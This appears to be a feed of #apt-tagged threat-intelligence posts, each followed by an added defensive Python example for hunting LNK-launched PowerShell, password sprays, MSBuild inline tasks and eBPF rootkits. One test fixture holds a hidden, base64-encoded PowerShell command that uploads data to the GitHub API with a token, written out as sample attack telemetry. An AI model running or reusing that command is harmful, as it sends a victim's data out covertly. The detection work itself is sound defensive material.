Improved indicators: NjRAT (+3), Tsunami (+1), XWorm (+1), ACR Stealer (+1), Xtreme RAT (+2), Remcos (+1) and SystemBC (+1). https://vuldb.com/actor #apt #cti #ioc
Actors

Predictive activity analysis of APT actors in social media, private forums, chat rooms, and darknet markets.

Vulnerability Database

DPRK campaign uses GitHub as C2 🚨
LNK files → PowerShell payload → data exfil via API

Trusted platform abuse = stealthy operations

https://www.technadu.com/dprk-phishing-campaigns-exploit-github-c2-to-target-users-in-south-korea/625004/

#Infosec #APT #ThreatIntel #Cybersecurity
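The chain in the post (shortcut launches hidden PowerShell, which pushes data to GitHub's API) leaves a recognisable footprint in endpoint telemetry. The following hunt is an added example, not code from the linked article: it scores each PowerShell process on the four signals of that chain and decodes any -EncodedCommand argument so the API call is visible. The event shape (Sysmon-style process create and network connect records, reduced to a few fields) and the sample events themselves are constructed.

```python
"""Hunt for an LNK -> hidden PowerShell -> GitHub API chain in endpoint telemetry.

Added example, not from the linked article. The event shape mimics Sysmon
Event ID 1 (process create) and Event ID 3 (network connect), reduced to the
fields the hunt needs; the sample events are constructed, not captured data.
"""
import base64
import re
from collections import defaultdict
from typing import Dict, List, Optional


def _enc(ps: str) -> str:
    """Encode a script the way PowerShell -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry. "A1" is the chain in the post: Explorer launches a
# shortcut, which runs hidden, encoded PowerShell that pushes data to the GitHub
# contents API. "B2" is a developer's build script that also reaches GitHub.
SAMPLE_EVENTS: List[Dict] = [
    {"id": 1, "guid": "A1",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -w hidden -nop -enc " + _enc(
         'Invoke-RestMethod -Uri "https://api.github.com/repos/acme/notes/contents/out.txt" '
         '-Method Put -Headers @{Authorization="token ghp_example"}')},
    {"id": 3, "guid": "A1", "dst_host": "api.github.com", "dst_port": 443},
    {"id": 1, "guid": "B2",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "cmdline": "powershell.exe -NoProfile -File build.ps1"},
    {"id": 3, "guid": "B2", "dst_host": "api.github.com", "dst_port": 443},
]

ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN = re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b")
GITHUB_API = re.compile(r"(?i)https?://api\.github\.com/")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt_lnk_chain(events: List[Dict], min_signals: int = 3) -> List[Dict]:
    """Score each PowerShell process on the signals that make up the chain."""
    procs = {e["guid"]: e for e in events if e["id"] == 1}
    hosts = defaultdict(set)
    for e in events:
        if e["id"] == 3:
            hosts[e["guid"]].add(e["dst_host"].lower())

    hits = []
    for guid, p in procs.items():
        if not p["image"].lower().endswith("powershell.exe"):
            continue
        reasons = []
        # A double-clicked shortcut is started by Explorer, not by a build tool or a shell.
        if p["parent"].lower().endswith(r"\explorer.exe"):
            reasons.append("spawned by explorer.exe (consistent with a shortcut launch)")
        if HIDDEN.search(p["cmdline"]):
            reasons.append("hidden window")
        decoded = decode_encoded_command(p["cmdline"])
        if decoded is not None:
            reasons.append("encoded command")
        # Look for the API both in the (decoded) script and in observed connections.
        if GITHUB_API.search(decoded or p["cmdline"]) or "api.github.com" in hosts[guid]:
            reasons.append("talks to api.github.com")
        if len(reasons) >= min_signals:
            hits.append({"guid": guid, "reasons": reasons, "decoded": decoded})
    return hits


if __name__ == "__main__":
    for hit in hunt_lnk_chain(SAMPLE_EVENTS):
        print(hit["guid"], "|", "; ".join(hit["reasons"]))
        print("  decoded:", hit["decoded"])
```

The developer's build script reaches api.github.com too, which is why a single signal is not an alert: the combination of Explorer parent, hidden window, encoded command and the API destination is what separates the shortcut chain from normal GitHub traffic. Blocking api.github.com outright is rarely an option, so the detection has to lean on the launch context.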

📰 Iranian Hackers Launch Coordinated Password Spray Attacks on Middle East

🇮🇷 Iranian APT Gray Sandstorm linked to password spray attacks against Israel & UAE. The campaign, targeting M365 accounts, appears coordinated with kinetic military strikes to aid in damage assessment. #APT #Iran #CyberWarfare #PasswordSpray

🔗 https://cyber.netsecops.io/articles/iranian-hackers-launch-coordinated-password-spray-attacks-on-middle-east/?utm_source=mastodon&utm_medium=social&utm_campaign=twitter_auto

The Iranian APT group Gray Sandstorm is suspected of conducting a large-scale password spray attack against Microsoft 365 accounts in Israel and the UAE to support kinetic military operations.

CyberNetSec.io
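A spray differs from brute force in shape: one or two guesses against many accounts, each staying under its lockout threshold. That shape is easy to pick out of sign-in logs once failures are grouped by source IP and time. The detector below is an added example, not from the linked article; the records are shaped loosely after Entra ID sign-in events and are constructed (error code 50126 is Entra ID's "invalid username or password"; 0 is used here for success). Thresholds and the allowed-failures-per-account value are assumptions to tune per tenant.

```python
"""Flag password-spray patterns in cloud sign-in logs.

Added example, not from the linked article. Records are shaped loosely after
Entra ID sign-in events (user, source IP, timestamp, result code); the sample
is constructed. Error 50126 is the Entra ID code for an invalid username or
password; a code of 0 stands for success here.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

INVALID_CREDENTIALS = 50126
SUCCESS = 0

T0 = datetime(2025, 6, 15, 2, 0)  # constructed timestamps, early morning
SAMPLE_SIGNINS: List[Dict] = []
# One source IP tries a single password against many accounts, 45 seconds apart,
# and one of those guesses works.
for i, name in enumerate(["alice", "bob", "carol", "dave", "erin", "frank", "grace", "heidi"]):
    SAMPLE_SIGNINS.append({"time": T0 + timedelta(seconds=45 * i), "user": f"{name}@example.com",
                           "ip": "203.0.113.7", "code": INVALID_CREDENTIALS})
SAMPLE_SIGNINS.append({"time": T0 + timedelta(minutes=9), "user": "heidi@example.com",
                       "ip": "203.0.113.7", "code": SUCCESS})
# A legitimate user mistypes their own password three times, then gets in.
for j in range(3):
    SAMPLE_SIGNINS.append({"time": T0 + timedelta(minutes=20 + j), "user": "alice@example.com",
                           "ip": "198.51.100.5", "code": INVALID_CREDENTIALS})
SAMPLE_SIGNINS.append({"time": T0 + timedelta(minutes=24), "user": "alice@example.com",
                       "ip": "198.51.100.5", "code": SUCCESS})


def detect_spray(records: List[Dict], window: timedelta = timedelta(minutes=30),
                 min_users: int = 8, max_per_user: int = 2) -> List[Dict]:
    """Report source IPs that fail against many distinct users, few times each, in one window.

    A spray is the inverse of brute force: breadth across accounts, one or two guesses
    per account, which keeps every account under its lockout threshold.
    """
    by_ip = defaultdict(list)
    for r in records:
        by_ip[r["ip"]].append(r)

    alerts = []
    for ip, rows in by_ip.items():
        rows.sort(key=lambda r: r["time"])
        failures = [r for r in rows if r["code"] == INVALID_CREDENTIALS]
        best: Counter = Counter()
        lo = 0
        for hi in range(len(failures)):  # sliding window over failures ordered by time
            while failures[hi]["time"] - failures[lo]["time"] > window:
                lo += 1
            counts = Counter(f["user"] for f in failures[lo:hi + 1])
            if len(counts) >= min_users and max(counts.values()) <= max_per_user \
                    and len(counts) > len(best):
                best = counts
        if best:
            # A success for a sprayed account from the same IP is the account to reset first.
            successes = sorted({r["user"] for r in rows if r["code"] == SUCCESS and r["user"] in best})
            alerts.append({"ip": ip, "targeted": sorted(best), "successes": successes})
    return alerts


if __name__ == "__main__":
    for a in detect_spray(SAMPLE_SIGNINS):
        print(f"{a['ip']}: {len(a['targeted'])} accounts sprayed, compromised: {a['successes']}")
```

Two caveats for production use: a corporate NAT or VPN egress can put many users behind one IP and needs a per-source baseline rather than a fixed threshold, and a patient attacker rotates source IPs, so the same grouping is worth repeating on user agent, ASN or the tenant-level failure rate. The "successes" list is the actionable output: those accounts get a credential reset and a session revocation before anything else.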

📰 Chinese APT Mustang Panda Renews Espionage Campaign Against European Governments

🇨🇳 Chinese APT Mustang Panda (TA416) is back, targeting European governments, EU & NATO missions with updated tactics. Campaigns use phishing links, abuse MSBuild, and deploy PlugX malware for espionage. #APT #MustangPanda #CyberSecurity #China

🔗 https://cyber.netsecops.io/articles/chinese-apt-mustang-panda-renews-espionage-campaign-against-european-governments/?utm_source=mastodon&ut…

The Chinese APT group TA416 (Mustang Panda) has launched new cyber-espionage campaigns targeting European governments, using evolving tactics like MSBuild abuse to deliver PlugX malware.

CyberNetSec.io
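The post says only that the campaign abuses MSBuild. The common form of that abuse (MITRE ATT&CK T1127.001) is a project file whose UsingTask carries inline C# or VB source that MSBuild.exe compiles and executes itself, so a signed Microsoft binary does the loading. The triage below is an added example, not code from the article, and it assumes that inline-task form; both project files are constructed, and the user-writable path list is an assumption.

```python
"""Triage MSBuild project files and launch context for the inline-task abuse pattern.

Added example, not from the linked article. The article only says the campaign
abuses MSBuild; this code assumes the common form of that abuse, a project file
whose UsingTask carries inline C# (or VB) source that MSBuild compiles and runs
itself (MITRE ATT&CK T1127.001). Both project files below are constructed.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

SUSPICIOUS_PROJECT = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build">
    <RunMe />
  </Target>
  <UsingTask TaskName="RunMe" TaskFactory="CodeTaskFactory"
             AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs"><![CDATA[
        // constructed placeholder body; a real loader would decode and run a payload here
        public class RunMe : Microsoft.Build.Utilities.Task {
            public override bool Execute() { return true; }
        }
      ]]></Code>
    </Task>
  </UsingTask>
</Project>"""

BENIGN_PROJECT = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
  </PropertyGroup>
</Project>"""


def _local(tag: str) -> str:
    """Strip the XML namespace; legacy projects use the msbuild/2003 namespace, SDK-style ones none."""
    return tag.rsplit("}", 1)[-1]


def inspect_project(xml_text: str) -> List[Dict]:
    """Return findings for inline code tasks and shell commands embedded in a project."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        name = _local(el.tag)
        if name == "UsingTask" and "TaskFactory" in el.attrib:
            code = next((c for c in el.iter() if _local(c.tag) == "Code"), None)
            if code is not None:
                findings.append({"type": "inline_task",
                                 "task": el.attrib.get("TaskName"),
                                 "factory": el.attrib["TaskFactory"],
                                 "language": code.attrib.get("Language", "cs"),
                                 "source_bytes": len(code.text or "")})
        elif name == "Exec" and "Command" in el.attrib:
            findings.append({"type": "exec", "command": el.attrib["Command"]})
    return findings


# Build systems live in source trees; a project fed to MSBuild from a download or
# temp folder is worth a look regardless of its contents. Assumed path list.
USER_WRITABLE = re.compile(
    r"(?i)\\(?:Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)|Windows\\Temp|ProgramData)\\")


def project_from_user_writable_path(path: str) -> bool:
    """True when the project path sits somewhere an unprivileged user can write."""
    return bool(USER_WRITABLE.search(path))


if __name__ == "__main__":
    print(inspect_project(SUSPICIOUS_PROJECT))
    print(inspect_project(BENIGN_PROJECT))
    print(project_from_user_writable_path(r"C:\Users\jdoe\AppData\Local\Temp\update.xml"))
```

Inline tasks are legitimate in some build pipelines, so the finding is a triage signal, not a verdict: pair it with the launch context (MSBuild.exe started by Explorer or a script host rather than devenv or dotnet, and a project path outside any source checkout) before treating it as an incident. Hosts with no development role can block MSBuild.exe outright via application control.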

apt update fails due to missing release file (Ubuntu 20.04) #apt #upgrade #updates

https://askubuntu.com/q/1565368/612

I am trying to upgrade an old linux machine from Ubuntu 20.04 to the latest LTS. I am being blocked by a single package failing to update. When upgrading via the Software Updater, the upgrade fails...

Ask Ubuntu
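
The usual cause of "does not have a Release file" on an old install is a third-party source (typically a PPA) that no longer publishes for that suite, and the fix is to disable that one entry, not the whole sources list. The script below is an added example, not from the Ask Ubuntu thread: it pulls the offending repository and suite out of apt's own error line and comments out the matching deb/deb-src entries. The apt output and sources list are constructed.

```python
"""Find the sources that make `apt update` fail with "does not have a Release file" and disable them.

Added example, not from the Ask Ubuntu thread. The apt output and sources list
below are constructed; the "E: The repository ... does not have a Release file."
line is apt's own error format.
"""
import re
from typing import List, Tuple

# Constructed excerpt of `sudo apt-get update` output on a 20.04 box with a dead PPA.
APT_OUTPUT = """Hit:1 http://archive.ubuntu.com/ubuntu focal InRelease
Hit:2 http://archive.ubuntu.com/ubuntu focal-updates InRelease
Ign:3 http://ppa.launchpad.net/example/ppa/ubuntu focal InRelease
Err:4 http://ppa.launchpad.net/example/ppa/ubuntu focal Release
  404  Not Found [IP: 192.0.2.10 80]
Reading package lists...
E: The repository 'http://ppa.launchpad.net/example/ppa/ubuntu focal Release' does not have a Release file.
N: Updating from such a repository can't be done securely, and is therefore disabled by default.
"""

# Constructed /etc/apt/sources.list plus a sources.list.d PPA file, concatenated.
SOURCES = """deb http://archive.ubuntu.com/ubuntu focal main restricted universe multiverse
deb http://archive.ubuntu.com/ubuntu focal-updates main restricted universe multiverse
deb [arch=amd64] http://ppa.launchpad.net/example/ppa/ubuntu focal main
deb-src http://ppa.launchpad.net/example/ppa/ubuntu focal main
"""

RELEASE_ERR = re.compile(
    r"^E: The repository '(\S+) (\S+) Release' does not have a Release file\.", re.M)
# deb or deb-src, optional [options], then URI and suite.
SOURCE_LINE = re.compile(r"^(deb(?:-src)?)\s+(?:\[[^\]]*\]\s+)?(\S+)\s+(\S+)")


def stale_repos(apt_output: str) -> List[Tuple[str, str]]:
    """Return (uri, suite) pairs apt reported as having no Release file."""
    return RELEASE_ERR.findall(apt_output)


def disable_sources(sources_text: str, stale: List[Tuple[str, str]]) -> str:
    """Comment out every deb/deb-src line whose URI and suite match a stale repository."""
    wanted = {(uri.rstrip("/"), suite) for uri, suite in stale}
    out = []
    for line in sources_text.splitlines():
        m = SOURCE_LINE.match(line)
        if m and (m.group(2).rstrip("/"), m.group(3)) in wanted:
            out.append("# disabled, no Release file: " + line)
        else:
            out.append(line)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    stale = stale_repos(APT_OUTPUT)
    print("stale:", stale)
    print(disable_sources(SOURCES, stale))
```

One check before disabling anything: if the entries apt complains about are the main archive.ubuntu.com or security.ubuntu.com lines rather than a PPA, the release itself has left standard support, and the right move is to point those lines at old-releases.ubuntu.com (or enrol in extended support) so the upgrade path stays intact, not to comment them out. The release upgrader also disables third-party entries it finds on its own, so a PPA that breaks `apt update` is worth removing before running it rather than fighting the failure afterwards.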
Indicators added for: DeerStealer (+2), RemcosRAT (+1), GuLoader (+2), Amnesia RAT (+1), Havoc (+1), Sliver (+2) and STRRAT (+1). https://vuldb.com/actor #apt #cti #ioc
Google links Axios npm supply chain attack to North Korea-linked APT UNC1069

Google links the Axios npm supply chain attack to North Korean threat group UNC1069, targeting financial gain.

Security Affairs

"Everything works, but the DB is leaking": how a contractor compromise led to an eBPF rootkit and a data leak

When we talk about supply chain attacks, what usually comes to mind is something monumental: SolarWinds, breaches of the giants' infrastructure. But the truth is that today any business that hires external admins or DevOps engineers risks picking up malware that can sit inside the perimeter for years and siphon off databases (DBs). And you would not even know about it... In this article I want to share a real case from practice: how the compromise of a contractor's laptop led to an eBPF rootkit being planted on Linux. What helped uncover the attack was... well, let's say an accidental slip by the attackers themselves.

https://habr.com/ru/articles/1017934/

#APT #redteam #forensic_analysis

Habr
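The article describes the rootkit only at the level of the incident, so the first question a responder asks is what eBPF programs the kernel is actually running and who loaded them. The triage below is an added example, not from the Habr article: it reads `bpftool prog show -j` output and flags programs of the types a rootkit needs (kernel hooks and the packet path) that have no owning process or an owner outside an allowlist. The JSON is constructed in bpftool's shape, and the allowlist of owners is an assumption to replace with the host's real tooling.

```python
"""Triage loaded eBPF programs from `bpftool prog show -j` output.

Added example, not from the Habr article, which describes the rootkit only
at the level of the incident. The JSON below is constructed in the shape
bpftool prints (id, type, name, tag, pids with pid/comm); the allowlist of
owning processes is an assumption to be replaced with the host's real tooling.
"""
import json
from typing import Dict, List, Set

SAMPLE_BPFTOOL_JSON = json.dumps([
    {"id": 12, "type": "cgroup_skb", "name": "sd_fw_egress", "tag": "6deef7357e7b4530",
     "pids": [{"pid": 1, "comm": "systemd"}]},
    {"id": 47, "type": "kprobe", "name": "kp_getdents64", "tag": "0123456789abcdef",
     "pids": []},
    {"id": 48, "type": "tracepoint", "name": "tp_sys_enter_write", "tag": "fedcba9876543210",
     "pids": [{"pid": 4242, "comm": "bpftrace"}]},
    {"id": 51, "type": "sched_cls", "name": "tc_egress", "tag": "89abcdef01234567",
     "pids": [{"pid": 9001, "comm": "kworker/0:1"}]},
])

# Program types a rootkit needs: hooks on syscalls and kernel functions to hide
# files, processes and sockets, or a seat on the packet path to carry data out.
HOOKING_TYPES: Set[str] = {"kprobe", "tracepoint", "tracing", "lsm", "sched_cls", "xdp", "sock_ops"}
# Assumed allowlist of processes expected to own such programs on this host.
ALLOWED_OWNERS: Set[str] = {"systemd", "bpftrace", "cilium-agent", "falco"}


def triage(bpftool_json: str, allowed: Set[str] = ALLOWED_OWNERS) -> List[Dict]:
    """Return hooking programs without a known owning process, in id order."""
    flagged = []
    for prog in sorted(json.loads(bpftool_json), key=lambda p: p["id"]):
        if prog["type"] not in HOOKING_TYPES:
            continue
        owners = {p["comm"] for p in prog.get("pids", [])}
        if not owners:
            # The loader exited but the program is still alive: it is pinned under
            # /sys/fs/bpf or held by a bpf_link, both of which are worth inspecting.
            flagged.append({"id": prog["id"], "name": prog["name"], "type": prog["type"],
                            "reason": "no owning process"})
        elif not owners & allowed:
            # A userspace pid presenting a kernel-thread style comm is itself a tell.
            flagged.append({"id": prog["id"], "name": prog["name"], "type": prog["type"],
                            "reason": "owned by " + ", ".join(sorted(owners))})
    return flagged


if __name__ == "__main__":
    for f in triage(SAMPLE_BPFTOOL_JSON):
        print(f"prog {f['id']} ({f['type']} {f['name']}): {f['reason']}")
```

The caveat that matters here is that a rootkit which hooks getdents or the bpf() syscall can hide its own programs from bpftool on the live host, so treat an empty or clean listing as unconfirmed: enumerate program ids from a statically linked tool you brought with you (BPF_PROG_GET_NEXT_ID walks the id space without relying on the host's bpftool), cross-check pinned objects under /sys/fs/bpf and bpf file descriptors in /proc/*/fdinfo, and compare with a listing taken from a trusted boot medium. The same goes for the comm field, which the owning process chooses for itself.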
Added some more indicators for: AsyncRAT (+1), TinyNuke (+1), APT28 (+3), HellsUchecker (+5), Void Manticore (+8), SafePay (+10) and CastleRAT (+1). https://vuldb.com/actor #apt #cti #ioc